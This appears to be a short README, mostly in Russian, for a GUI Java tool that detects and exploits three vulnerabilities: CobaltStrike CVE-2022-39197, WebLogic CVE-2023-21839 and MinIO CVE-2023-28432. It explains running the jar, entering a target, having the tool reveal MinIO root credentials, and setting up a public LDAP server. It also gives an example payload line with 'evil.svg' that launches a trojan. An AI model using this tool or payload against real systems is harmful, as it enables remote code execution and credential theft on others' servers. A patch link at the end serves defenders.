
Инструмент для тестирования CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Графический инструмент для обнаружения и эксплуатации этих трех уязвимостей
Для запуска jar требуется Java 8
Предназначен для одной цели, не подходит для массового сканирования IP
При сборке для эксплуатации уязвимости Weblogic необходимо указать wlfullclient.jar, его нужно добавить самостоятельно
java -jar Gui-poc-test.jar
Способ использования: есть две кнопки — «Обнаружение» и «Эксплуатация». Для разных уязвимостей инструмент подсказывает способ использования в интерфейсе.
Введите цель, порт указывать не обязательно, по умолчанию 9000, можно изменить (см. исходный код GuiDemo.java:line144)
Отображаются MINIO_ROOT_USER, MINIO_ROOT_PASSWORD и др.
Введите IP цели, порт, адрес LDAP-сервера
Обнаружение:
Примечание: для эксплуатации уязвимости необходимо самостоятельно развернуть LDAP-сервер (публичный)

Пример полезной нагрузки:
beacon.exe http://127.0.0.1:4444/evil.svg
Результат: на Win запускается троян, на Mac CS-клиент подключается
Одновременно на стороне CS выполняется содержимое JAR-пакета, открывается калькулятор

На Win фиксируется адрес посещения CS

Патч для CS: https://github.com/burpheart/CVE-2022-39197-patch